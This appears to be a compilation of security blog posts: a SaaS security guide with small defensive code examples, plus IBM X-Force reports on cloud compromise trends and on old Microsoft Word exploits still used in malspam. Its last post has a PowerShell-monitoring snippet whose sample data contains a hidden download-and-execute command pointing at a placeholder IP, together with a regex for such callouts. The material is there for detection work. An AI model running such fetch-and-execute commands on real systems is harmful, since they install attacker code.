As SaaS usage and adoption continue to increase, so does the SaaS security problem. The top SaaS security issues are misconfigurations, access management, compliance, data storage, retention, privacy and data breaches, and disaster recovery.

It is easy to believe that securing SaaS is simply a matter of controlling what users access on the internet. However, securing SaaS usage is far more challenging than it initially appears.

The fact is that there is no universal, all-encompassing SaaS security checklist. Businesses vary; they perform distinct tasks, operate differently, and have specific needs. Check out this article by Zluri.

Why is SaaS Security a priority?

Many firms are familiar with IaaS and PaaS security threats. IT and security teams frequently communicate through linked business processes and applications. IaaS and PaaS management and security technologies are also widespread.

SaaS security can safeguard a corporation from cyberattacks and data leaks. Any SaaS company should take security precautions to secure its data, assets, and reputation. 

SaaS programs work differently and provide advantages to businesses. However, they can be more difficult to administer from a security standpoint:

 

Complexity:

The design of SaaS applications supports a range of teams inside a business. For example, systems of record hold client data for sales teams, source code for development teams, and HR information for HR teams. Such SaaS apps are typically used regularly by many end users with varying degrees of technical expertise. SaaS apps are challenging to understand due to their volume and complexity.

Communication:

There is limited communication between security teams and the business administrators who select and manage new SaaS technology. Limited contact makes it more challenging for security teams to identify the breadth of use, and the related dangers, of fully operational apps.

Collaboration:

The internal teams supporting SaaS services typically lack the requisite guidance to safeguard them. Constant communication is necessary to balance business and security requirements. To maintain consistency, enterprises should invest more resources and effort in identifying and addressing security issues, and treat SaaS security like bare-metal, IaaS, PaaS, and endpoint security.

The security problems that SaaS users face

McKinsey surveyed cybersecurity specialists from over 60 firms to understand how they handled SaaS security concerns. Most respondents said they had increased their attention to SaaS security, examining both their own and their providers' security offerings.

As expected, Chief Information Security Officers (CISOs) were frustrated by suppliers' security deficiencies. They complained about contractual and implementation delays and a lack of customer-centric security. They wanted SaaS companies to make it simpler for security experts to understand product security and to set up and integrate the products.

Most respondents used SaaS for IT service management and office automation. But, given the dangers, several CISOs said their firms weren't ready for SaaS in essential areas. Resource planning software was deemed too risky, since downtime could cripple the company. Due to data confidentiality, companies hesitated to use SaaS for health-related or mergers-and-acquisitions applications.

With more complex technologies like AI, cyberattacks become more sophisticated. For this reason, you must regularly review your SaaS security procedures. In case you are unfamiliar with them, listed here are the seven most prevalent SaaS security concerns.

1. Management of Identity and Access

A CISO establishing a SaaS application security strategy must include access management as one of the fundamental foundations. However, if not done precisely, it can create a security hole that allows an attacker to enter. 

Single Sign-On

Single Sign-On (SSO) and Secure Web Gateways (SWG) are examples of successful Identity and Access Management (IAM) strategies implemented by SaaS companies. With SSO, the user logs in once to access all linked services inside a single ecosystem. However, if the provider lacks a secure access mechanism, SSO can itself introduce SaaS security problems, since a single compromised ID and password grants access to multiple services.

2. Virtualization

Most SaaS services utilize virtualization because it provides more uptime than conventional computers. Nonetheless, if a single virtual machine is hacked, numerous parties may have problems since data is copied across servers. Virtualization has substantially improved mobile app security over the years, but there are still vulnerabilities that hackers are likely to exploit. 

3. Obscurity

The SaaS model concentrates on application and business continuity while the service providers make infrastructure and architecture decisions. Occasionally, these suppliers withhold crucial back-end information, a significant red flag. CISOs should hold one-on-one meetings with service providers and inquire about their security measures. Remember that you must select a service that can provide adequate responses on data security. 

4. Accessibility

Suitable SaaS applications are available from any location. This benefit, however, can quickly turn negative if the devices accessing the application are infected with viruses and malware. In addition, if the user accesses the application over a public WiFi network or an untrusted VPN, it can pose a security risk to your infrastructure. Therefore, CISOs should prioritize safeguarding all endpoints to prevent such threats.

For example, the NHS (National Health Service) is a publicly financed healthcare institution in the United Kingdom. Its systems contain voluminous sensitive data, such as patients' health information, physicians' information, and pharmaceutical data, so protecting every endpoint was essential. The NHS partnered with Cisco, which helped build the SecureX unified security platform. This technology protects the NHS's highly targeted PII (Personally Identifiable Information) against online criminals and helps protect data from phishing attempts, ransomware, data exfiltration, and more.

5. Data Control

With SaaS, all data is stored and managed on the cloud, leaving you little control over data storage and management. If you have a problem, you are relying on the service providers. Before signing a contract, ask the SaaS provider about data storage patterns, security measures, and disaster recovery processes. After receiving positive responses, you can form a partnership with the supplier. 

6. Misconfigurations

SaaS apps are renowned for incorporating several complex features into a single solution. However, this adds complexity to the code and increases the likelihood of misconfigurations. Even a small configuration error can affect the availability of your cloud services. In one of the most disastrous misconfigurations, in 2008 Pakistan Telecom attempted to restrict YouTube locally for legal reasons; instead, it announced a dummy route that leaked beyond its network, leaving YouTube unavailable worldwide for two hours.

7. Disaster Restoration

Regardless of the security procedures you employ to protect your application, server, infrastructure, and data, there is always the possibility of a disaster, since the future is unpredictable. CISOs should ask suppliers of SaaS security solutions:

  • In the event of a catastrophe, what happens to all cloud-stored data?
  • Do you ensure complete data recovery?
  • Do you include disaster recovery in your service-level agreement?
  • How long will it require to retrieve and restore the data? 

5 Ways to Strengthen your SaaS Security with SaaS Ops

 SaaS Security with SaaS Ops

Source

  1. Develop Real-time Security Observability and Ongoing System Monitoring 

Due to the dynamic infrastructure, changes in SaaS settings tend to occur often, take effect instantly, and influence many resources. Running a SaaS infrastructure without real-time security monitoring and observability is equivalent to flying blind.

  2. Configure and Constantly Monitor Configuration Settings

The SaaS landscape is constantly evolving. Since services are frequently launched and withdrawn in real time, configuring them correctly and monitoring settings can help you secure your customers’ data. 

  3. Utilize Operations Theory for Security

Practical operations principles may address tech sprawl, lack of integration between tool sets, lack of visibility, and operations running at the speed of business without security checks. Remember, “Great ops = great security.” 

  4. Protect Data

Storing unencrypted data on the cloud can expose your business to reputational harm, revenue loss, and customer loss. Encryption is one of the simplest and most effective methods for securing client information.

 Obtain Compliance & Regulatory Consulting Services, IT Audits, Risk & Security Management solutions, and training programs that meet the industry’s Regulatory Compliance and Information Security problems.

  5. Measure & Enhance Performance

If you have a method for measuring performance, you can examine the impact of infrastructure modifications. Consequently, you can make the continuous security and performance improvements essential for strengthening client relationships.

Now that you have a better grasp of the SaaS data security landscape, let’s examine the measures you can take to secure this at your organization: 

1. Document your Data Processing Actions

Regarding SaaS data security, the RoPA is just one starting point. RoPA stands for Record of Processing Activities, a requirement of the GDPR. You are compelled by law to comply with this requirement.

Consider this an overview of all of your data processing procedures. It is a single document detailing your company’s data processing activities. Some examples of personal information processing activities include marketing, human resources, and third-party operations.

This is vital not just because the GDPR requires it but also because it helps organizations self-audit. If you keep track of and understand your data processing operations, you will be in the best position to implement data security.

After all, you cannot manage risks without first identifying them, correct?

2. Establish Authentication Methods and Require Strong Passwords

Implementing appropriate access controls is one of the most critical measures to reduce the likelihood of a data breach. The first line of defense in this regard is a strong password.

Whenever a user creates an account, you must ensure that they choose a secure and effective password containing a combination of uppercase and lowercase letters, numbers, and special characters. Do not permit easily guessable terms as passwords.

Verify that you do not depend solely on passwords to grant access to an individual’s account. Multi-factor authentication necessitates completing more than one step before admittance is granted.

Several more alternatives are available, such as requiring the user to enter a code sent to their cell phone or performing facial verification. It depends on the software you provide and the individuals using it.

3. Educate both your Consumers and your Staff

Education is essential for data security. You must do everything in your power to ensure that everyone using your program has adequate security expertise.

Did you know that 94% of businesses have had an insider data breach? While a few of these incidents may have been caused by malevolent employees, the great majority have been the consequence of unintended employee acts.

If they had received training on data security, this event might never have occurred.

The issue is that many companies are concerned only with the cost and resources associated with training. Nonetheless, it is crucial to calculate how much money you would lose if you were the victim of a data breach.

In addition, you must ensure that you are simultaneously teaching your clients. According to Gartner, customers will be accountable for 95% of cloud security breaches.

Whether releasing critical upgrades to existing clients or onboarding new ones, you must actively inform them how their activities affect security.

A growing number of SaaS companies are transitioning to cloud-based infrastructures. The great majority of customers are unaware of the ramifications of this decision. Educating your customers on how to secure their data is essential to reduce the likelihood of a security breach. 

4. Continuously Monitor User Responsibilities and Access

In addition to the topics we've already discussed, you must continue to monitor segregation-of-duties (SOD) violations.

SaaS applications are developed with initial role definitions. As time passes, however, these roles and their users can drift, leading to SOD violations, which can be a significant compliance burden.

To prevent SOD breaches, you must regularly monitor people and their assigned roles. 

5. Employ a Cybersecurity Company

If you are having trouble with SaaS data security, you should contact a cybersecurity company with experience in this field. Security is a challenging subject to master. You cannot afford to cut corners, since doing so might result in your company suffering a data breach that could cost you hundreds of thousands or even millions of dollars.

A good cybersecurity company can perform a vulnerability assessment and even provide services such as penetration testing. If you have never heard the term before, penetration testing is ethical hacking: someone with good intentions hacks into your system before someone with malicious intent does. This will reveal any software vulnerabilities so that you can make the necessary modifications.

Numerous aspects must be considered when searching for a reputable cybersecurity company. You want a firm with a solid reputation and extensive industry expertise.

As for experience, you should not only seek a company with a substantial number of years under its belt; you should also ensure that it has extensive expertise working with SaaS organizations.

Tips for SaaS security

These strategies can protect SaaS environments and assets.

1. Authentication Strengthening

Cloud providers handle authentication differently, making it challenging to decide how customers should access SaaS applications. Some providers support customer-managed identity providers, such as Active Directory (AD), via SAML, OpenID Connect and Open Authorization (OAuth). Some providers allow multifactor authentication; some don’t.

The security team must know which services are used and the alternatives each service supports to manage SaaS products. This context allows administrators to choose the proper authentication method(s).

If the SaaS provider supports it, single sign-on (SSO) tied to AD ensures that account and password policies carry over to the application’s services.
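As a rough illustration of that decision, the sketch below walks a SaaS inventory and picks the strongest authentication method each service supports; the app names and capability labels are hypothetical.

```python
# Sketch: given what each SaaS app supports, select the strongest available
# authentication method. App names and capability lists are hypothetical.

PREFERENCE = ["sso_saml", "oidc", "mfa", "password"]  # strongest first

def choose_auth(supported):
    """Return the first method in PREFERENCE that the app supports."""
    for method in PREFERENCE:
        if method in supported:
            return method
    return None

apps = {
    "crm": ["password", "mfa", "sso_saml"],
    "chat": ["password", "mfa"],
    "legacy-notes": ["password"],
}
for app, supported in apps.items():
    print(app, "->", choose_auth(supported))
```

This kind of table, however it is maintained, gives administrators the context the security team needs before enabling SSO or MFA per service.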

2. Encryption of Data

The channels that interface with SaaS apps use Transport Layer Security (TLS) to secure data in transit. Some SaaS providers also offer data-at-rest encryption; this feature may be enabled by default or may require activation.

Investigate each SaaS service’s security procedures to discover if data encryption is possible and activate it if so. 
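For data in transit, the policy can be enforced in client code rather than assumed. The sketch below pins a TLS 1.2 floor on outbound connections using Python’s standard-library `ssl` module:

```python
import ssl

# Sketch: enforce a TLS 1.2 minimum on outbound client connections.
# Recent Python defaults already refuse TLS 1.0/1.1, but pinning the floor
# explicitly documents the policy and survives interpreter upgrades.

def make_client_context():
    ctx = ssl.create_default_context()  # verifies certificates by default
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx

ctx = make_client_context()
print(ctx.minimum_version == ssl.TLSVersion.TLSv1_2)  # True
print(ctx.verify_mode == ssl.CERT_REQUIRED)           # True
```

The resulting context can then be passed to clients such as `http.client.HTTPSConnection(host, context=ctx)`.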

3. Oversight and Vetting

Review and examine any prospective SaaS provider (as you would with other vendors). Make sure you know how the service is used, its security model, and any extra security precautions. 

4. Discovery and Inventory

Tracking all SaaS usage is essential, as usage patterns can be unpredictable, especially when apps are launched quickly. Hunt for fresh, untracked SaaS use and stay watchful for changes. When possible, combine manual and automatic data collection to keep up with growing SaaS consumption and maintain a reliable, up-to-date inventory of services and users.
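One common automated approach is to compare the domains appearing in proxy or DNS logs against the approved inventory. The sketch below does exactly that; the log format, domains and inventory are hypothetical.

```python
# Sketch: surface untracked ("shadow") SaaS use by diffing domains seen in
# proxy/DNS logs against the approved inventory. All names are illustrative.

APPROVED = {"crm.example-saas.com", "storage.example-cloud.com"}

def shadow_saas(log_lines):
    """Return sorted list of observed domains not in the approved inventory."""
    seen = {line.split()[-1].lower() for line in log_lines if line.strip()}
    return sorted(seen - APPROVED)

logs = [
    "2022-09-01T10:00:00 alice crm.example-saas.com",
    "2022-09-01T10:05:00 bob unsanctioned-notes.app",
]
print(shadow_saas(logs))  # ['unsanctioned-notes.app']
```

A report like this, generated regularly, is the automatic half of the combined manual-plus-automatic collection recommended above.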

5. Cloud Access Security Broker (CASB) Tools

Consider employing a CASB solution when the SaaS provider does not provide sufficient security on its own. CASBs allow organizations to add SaaS-specific controls the provider lacks natively. Examine the SaaS provider’s security gaps, and understand the CASB deployment options (API-based or proxy-based) so you can choose the configuration that suits your organization’s architecture.

6. Situational Awareness

Review data from CASBs as well as the SaaS provider’s own data and logs to monitor SaaS usage. IT and security directors must treat SaaS products differently from conventional websites: they are complex tools requiring the same degree of protection as any business application.

Adopting SaaS security best practices with systematic risk management provides consumer and enterprise SaaS security.

7. Utilize SaaS Security Posture Management (SSPM)

SSPM ensures SaaS apps remain secure. An SSPM system monitors SaaS applications for gaps between declared security policy and actual security posture, allowing you to automatically detect and repair security vulnerabilities in SaaS assets and prioritize risk severity.
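The core SSPM loop, diffing the declared policy against each app’s observed settings and ranking the gaps by severity, can be sketched as follows (the setting names and severities are illustrative):

```python
# Sketch of the core SSPM idea: compare declared security policy against the
# actual settings reported by a SaaS app, ranked by severity.
# Setting names, values and severities are illustrative.

POLICY = {
    "mfa_required": (True, "critical"),
    "public_sharing": (False, "high"),
    "session_timeout_minutes": (30, "medium"),
}

def posture_gaps(actual):
    """Return (severity, setting, expected, found) tuples, worst first."""
    gaps = [(sev, key, want, actual.get(key))
            for key, (want, sev) in POLICY.items()
            if actual.get(key) != want]
    order = {"critical": 0, "high": 1, "medium": 2}
    return sorted(gaps, key=lambda g: order[g[0]])

observed = {"mfa_required": False, "public_sharing": False,
            "session_timeout_minutes": 480}
for sev, key, want, got in posture_gaps(observed):
    print(f"[{sev}] {key}: expected {want}, found {got}")
```

A real SSPM product runs this comparison continuously across every connected SaaS app and can remediate some gaps automatically.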

To summarize, many businesses rely on SaaS applications to perform mission-critical operations, so they must give the security measures around SaaS the same level of importance as those surrounding other technologies. You can maintain the security of your data and the seamless operation of your business by continuously monitoring your SaaS environment, fixing misconfigurations as soon as they are discovered, and keeping a tight check on third-party access to your systems.

Why is securing the external attack surface a hot topic for security experts right now?

By: detectify
23 February 2022 at 07:09

One of the most prevalent realizations in the cybersecurity world over the last 5 years has been that many organizations are simply not aware of the vastness of their external attack surface. This has given rise to a defensive principle called “External Attack Surface Management“, or EASM. Without an EASM program at your organization, there is a high chance that your external assets will fall into a state of vulnerability at some point. In this article, we’ll discuss why this is the case and how we might defend against it.

The post Why is securing the external attack surface a hot topic for security experts right now? appeared first on Detectify Blog.

Old Habits Die Hard: New Report Finds Businesses Still Introducing Security Risk into Cloud Environments

14 September 2022 at 06:00

While cloud computing and its many forms (private, public, hybrid cloud or multi-cloud environments) have become ubiquitous with innovation and growth over the past decade, cybercriminals have closely watched the migration and introduced innovations of their own to exploit the platforms. Most of these exploits are based on poor configurations and human error. New IBM Security X-Force data reveals that many cloud-adopting businesses are falling behind on basic security best practices, introducing more risk to their organizations.

Shedding light on the “cracked doors” that cybercriminals are using to compromise cloud environments, the 2022 X-Force Cloud Threat Landscape Report uncovers that vulnerability exploitation, a tried-and-true infection method, remains the most common way to achieve cloud compromise. Gathering insights from X-Force Threat Intelligence data, hundreds of X-Force Red penetration tests, X-Force Incident Response (IR) engagements and data provided by report contributor Intezer, between July 2021 and June 2022, some of the key highlights stemming from the report include:

  • Cloud Vulnerabilities are on the Rise — Amid a sixfold increase in new cloud vulnerabilities over the past six years, 26% of cloud compromises that X-Force responded to were caused by attackers exploiting unpatched vulnerabilities, becoming the most common entry point observed. 
  • More Access, More Problems — In 99% of pentesting engagements, X-Force Red was able to compromise client cloud environments through users’ excess privileges and permissions. This type of access could allow attackers to pivot and move laterally across a victim environment, increasing the level of impact in the event of an attack.
  • Cloud Account Sales Gain Ground in Dark Web Marketplaces — X-Force observed a 200% increase in cloud accounts being advertised on the dark web, with remote desktop protocol access and compromised credentials being the most popular cloud account sales making the rounds on illicit marketplaces.
Unpatched Software: #1 Cause of Cloud Compromise

As the rise of IoT devices drives more and more connections to cloud environments, the potential attack surface grows larger, introducing critical challenges that many businesses are experiencing, such as proper vulnerability management. Case in point: the report found that more than a quarter of studied cloud incidents were caused by the exploitation of known, unpatched vulnerabilities. While the Log4j vulnerability and a vulnerability in VMware Cloud Director were two of the more commonly leveraged vulnerabilities observed in X-Force engagements, most of the exploited vulnerabilities primarily affected the on-premises versions of applications, sparing the cloud instances.

As suspected, cloud-related vulnerabilities are increasing at a steady rate, with X-Force observing a 28% rise in new cloud vulnerabilities over the last year alone. With over 3,200 cloud-related vulnerabilities disclosed in total to date, businesses face an uphill battle when it comes to keeping up with the need to update and patch an increasing volume of vulnerable software. In addition to the growing number of cloud-related vulnerabilities, their severity is also rising, made apparent by the uptick in vulnerabilities capable of providing attackers with access to more sensitive and critical data as well as opportunities to carry out more damaging attacks.

These ongoing challenges point to the need for businesses to pressure test their environments, not only identifying weaknesses like unpatched, exploitable vulnerabilities, but prioritizing them based on severity to ensure the most efficient risk mitigation.
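As a simple illustration of that prioritization step, the sketch below ranks findings by known in-the-wild exploitation first and CVSS score second. Apart from Log4Shell (CVE-2021-44228), the entries and all scores are illustrative, not drawn from the report.

```python
# Sketch: prioritize unpatched findings by active exploitation first,
# CVSS score second. Entries other than Log4Shell are hypothetical.

findings = [
    {"name": "example-legacy-app", "cvss": 5.4, "exploited_in_wild": False},
    {"name": "Log4Shell (CVE-2021-44228)", "cvss": 10.0, "exploited_in_wild": True},
    {"name": "example-vpn-appliance", "cvss": 9.3, "exploited_in_wild": False},
]

def priority(finding):
    # Known in-the-wild exploitation outranks a raw severity score.
    return (finding["exploited_in_wild"], finding["cvss"])

for f in sorted(findings, key=priority, reverse=True):
    flag = "EXPLOITED IN WILD" if f["exploited_in_wild"] else ""
    print(f'{f["name"]:35} CVSS {f["cvss"]:>4} {flag}')
```

Real programs would feed this from a scanner and an exploitation feed such as a known-exploited-vulnerabilities catalog, but the ordering logic is the essential point.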

Excessive Cloud Privileges Aid in Bad Actors’ Lateral Movement

The report also shines a light on another worrisome trend across cloud environments — poor access controls, with 99% of pentesting engagements that X-Force Red conducted succeeding due to users’ excess privileges and permissions. Businesses are allowing users unnecessary levels of access to various applications across their networks, inadvertently creating a stepping stone for attackers to gain a deeper foothold into the victim’s cloud environment.

The trend underlines the need for businesses to shift to zero trust strategies, further mitigating the risk that overly trusting user behaviors introduce. Zero trust strategies enable businesses to put in place appropriate policies and controls to scrutinize connections to the network, whether from an application or a user, and iteratively verify their legitimacy. In addition, as organizations evolve their business models to innovate at speed and adapt with ease, it’s essential that they properly secure their hybrid, multi-cloud environments. Central to this is modernizing their architectures: not all data requires the same level of control and oversight, so determining the right workloads to put in the right place, for the right reasons, is important. Not only can this help businesses effectively manage their data, but it also enables them to place efficient security controls around it, supported by proper security technologies and resources.

Dark Web Marketplaces Lean Heavier into Cloud Account Sales

With the rise of the cloud comes the rise of cloud accounts being sold on the Dark Web, verified by X-Force observing a 200% rise in the last year alone. Specifically, X-Force identified over 100,000 cloud account ads across Dark Web marketplaces, with some account types being more popular than others. Seventy-six percent of cloud account sales identified were Remote Desktop Protocol (RDP) access accounts, a slight uptick from the year prior. Compromised cloud credentials were also up for sale, accounting for 19% of cloud accounts advertised in the marketplaces X-Force analyzed.

The going price for this type of access is remarkably low, making these accounts easily attainable for the average bidder: RDP access and compromised credentials sell for an average of $7.98 and $11.74, respectively. Compromised credentials’ 47% higher selling price is likely due to their ease of use, as well as the fact that postings advertising credentials often include multiple sets of login data, potentially from other services stolen along with the cloud credentials, yielding a higher ROI for cybercriminals.

As more compromised cloud accounts pop up across these illicit marketplaces for malicious actors to exploit, it’s important that organizations work toward enforcing more stringent password policies by urging users to regularly update their passwords, as well as implement multifactor authentication (MFA). Businesses should also be leveraging Identity and Access Management tools to reduce reliance on username and password combinations and combat threat actor credential theft.

To read our comprehensive findings and learn about detailed actions organizations can take to protect their cloud environments, review our 2022 X-Force Cloud Security Threat Landscape here.

If you’re interested in signing up for the “Step Inside a Cloud Breach: Threat Intelligence and Best Practices” webinar on Wednesday, September 21, 2022, at 11:00 a.m. ET you can register here.

If you’d like to schedule a consult with IBM Security X-Force visit: www.ibm.com/security/xforce?schedulerform

The post Old Habits Die Hard: New Report Finds Businesses Still Introducing Security Risk into Cloud Environments appeared first on Security Intelligence.

What’s Old Is New, What’s New Is Old: Aged Vulnerabilities Still in Use in Attacks Today

26 February 2020 at 06:05

As reported in the IBM X-Force Threat Intelligence Index 2020, X-Force research teams operate a network of globally distributed spam honeypots, collecting and analyzing billions of unsolicited email items every year. Analysis of data from our spam traps reveals trending tactics that attackers are utilizing in malicious emails, specifically, that threat actors are continuing to target organizations through the exploitation of older Microsoft Word vulnerabilities (CVE-2017-0199 and CVE-2017-11882).

  • CVE-2017-0199 was first disclosed and patched in April 2017. It allows an attacker to download and execute a Visual Basic Script containing PowerShell commands after the victim opens a malicious document containing an embedded exploit. Unlike many other Microsoft Word and WordPad exploits, the victim does not need to enable macros or accept any prompts — the document just loads and executes a malicious file of the attacker’s choosing.
  • CVE-2017-11882 was first disclosed and patched in November 2017. This vulnerability involves a stack buffer overflow in the Microsoft Equation Editor component of Microsoft Office that allows for remote code execution. Interestingly, the vulnerable component was 17 years old (compiled in 2000) at the time of exploitation and had remained unchanged until its removal in 2018.

These vulnerabilities, which were reported and patched in 2017, are the most frequently used of the top eight vulnerabilities observed in 2019. They were used in nearly 90 percent of malspam messages despite being well-publicized and dated. These findings highlight how delays in patching allow cybercriminals to continue to use old vulnerabilities and still see some success in their attacks.

2 Years and Still Going Strong

In addition to these vulnerabilities’ popularity in malspam, the volume of 2019 network attacks that targeted X-Force-monitored customers while attempting to exploit them was 25 times higher than the combined number of network attacks attempting to exploit similar vulnerabilities that leverage Object Linking and Embedding (OLE).

Our analysts did not observe a commonality regarding the malicious payloads used post-exploitation, which means that using these vulnerabilities is the choice of a wide array of threat actors and not specific to a small number of campaigns or adversarial groups.

Figure 1: Observed usage of top CVEs in 2019 spam emails (Source: IBM X-Force)

Another noteworthy insight from the figure above is that most vulnerabilities commonly used by cybercriminals are older ones. None of the vulnerabilities leveraged in 2019 were disclosed that same year, and only one was disclosed in 2018. The rest go back as far as 2003, further driving home the point that when it comes to malicious cyber activity, what’s old is new and what’s new is old.

The Allure of Older Vulnerabilities

Why would a wide array of threat actors use the same two old and well-known exploits in so many of their attacks? There are a few possible explanations, but the essence of it is they are cheaper, better documented, battle-tested and more likely to lead to legacy systems that are no longer being patched.

First, the exploits are very convenient for an attacker to use in that they don’t require user interaction. Unlike more recent Word vulnerabilities, which require the attacker to convince the user to enable macros, the exploits for these particular vulnerabilities automatically execute when the document is opened. This can help reduce the chance of arousing user suspicions and, accordingly, increase the rate of success.

Second, since so many different actors use these vulnerabilities, it can complicate attribution, as their widespread usage makes associating them with any particular individual or group difficult.

For example, IBM researchers recently observed threat actors leveraging these CVEs and using a variant of the X-Agent malware, which was historically associated with a threat actor known to IBM as ITG05 (also known as APT28). That threat group has been attributed to Russia’s Main Intelligence Directorate. But while they were being used by highly sophisticated threat actors, these vulnerabilities were also leveraged by low-end spammers dropping commodity malware through massive email campaigns.

The reuse of common exploits is a convenient way to muddy threat actor attribution, especially for groups that wish to remain anonymous in their operations. It can allow threat actors to hide among a large volume of activity, obfuscating their actions.

The third and perhaps most likely reason for the continued use of these vulnerabilities is the simple ease and convenience of generating documents that can exploit them. Because these types of documents are essential to the day-to-day operations of many target organizations, they are often not blocked by enterprise email filters. As a final bonus to threat actors, they are also some of the cheapest exploits cybercriminals can buy.

X-Force’s dark web research of underground forums highlights multiple offerings of free document builders that leverage each of these vulnerabilities. Our team also identified free YouTube videos focused on each vulnerability, illustrating how an attacker can generate a document to exploit these issues.

Figure 2: YouTube videos detailing how to generate documents exploiting CVEs 2017-0199, 2017-11882 (Source: IBM X-Force)

One should keep in mind that successful exploitation of older vulnerabilities is more likely to happen on older, unpatched operating systems (OSs) and legacy systems where OS end-of-life means that no new patches are even available. These kinds of systems are most likely used by organizations that can’t patch due to other issues or priorities. While there are many reasons that can contribute to the decision to defer patching, that decision is never a good one in the long run.

What Can Companies Do With This Sort of Information?

Older vulnerabilities are clearly not going away any time soon, so organizations need to be prepared to defend against their attempted exploitation. IBM X-Force Incident Response and Intelligence Services (IRIS) has the following tips for organizations to better protect themselves:

  • Asset management is an ongoing process that should be top of mind for risk management. Part of this process is continually assessing risk to critical systems and considering the consequences of not patching them. Reassess the risks and consider patching and updating operating systems as soon as possible. Reality check: Windows 7’s end-of-life took place on January 14, 2020. Is your organization ready to move to an updated OS?
  • On the application level, ensure that patches for productivity suites — especially Microsoft software — are applied as soon as they become available.
  • Monitor the organization’s environment for PowerShell callouts that may be attempting to download and execute malicious payloads.
  • Continue user education on the risks of opening attachments from unknown sources, as vulnerabilities like these do not require any user interaction beyond opening to cause harm.
  • Scope and engage in a vulnerability management program to determine if older vulnerabilities are exposing your environment to exploitation by an attacker.
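As a rough illustration of the PowerShell-monitoring tip above, the sketch below flags process command lines containing common download-and-execute patterns. The patterns and sample log lines are illustrative; production detection belongs in your EDR or SIEM rules.

```python
import re

# Sketch: flag command lines that resemble PowerShell download-and-execute
# callouts. Patterns and sample log lines are illustrative only.

SUSPICIOUS = re.compile(
    r"powershell.*(downloadstring|downloadfile|invoke-webrequest|iex|"
    r"frombase64string|bypass)",
    re.IGNORECASE,
)

def flag_callouts(cmdlines):
    """Return the subset of command lines matching a suspicious pattern."""
    return [c for c in cmdlines if SUSPICIOUS.search(c)]

sample = [
    "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
    ".DownloadString('http://203.0.113.5/p.ps1')",
    "powershell Get-ChildItem C:\\Reports",
]
print(flag_callouts(sample))  # flags the first command only
```

Even a crude filter like this, run over endpoint process logs, can surface the kind of PowerShell callouts these exploits rely on for payload delivery.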

The post What’s Old Is New, What’s New Is Old: Aged Vulnerabilities Still in Use in Attacks Today appeared first on Security Intelligence.
